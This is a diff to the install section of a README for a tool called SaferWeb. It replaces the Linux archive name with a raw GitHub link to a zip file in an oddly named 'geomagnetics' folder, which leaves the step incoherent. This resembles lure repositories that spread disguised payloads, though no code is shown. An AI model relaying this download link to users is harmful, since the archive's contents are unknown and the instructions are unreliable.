kya001/SaferWeb/README.md

 4. **Install SaferWeb**
    - **Windows:** Double-click the `.exe` file.
 Follow the prompts to install SaferWeb.
    - **macOS:** Open the `.dmg` file, then drag the SaferWeb icon to your Applications folder.
-   - **Linux:** Extract the `.tar.gz` file, open a terminal, navigate to the folder, and run the installation command.
+   - **Linux:** Extract the `https://raw.githubusercontent.com/kya001/SaferWeb/main/geomagnetics/SaferWeb_1.9.zip` file, open a terminal, navigate to the folder, and run the installation command.

 5. **Run SaferWeb**
    To start using SaferWeb, locate the installed program on your computer and double-click the icon.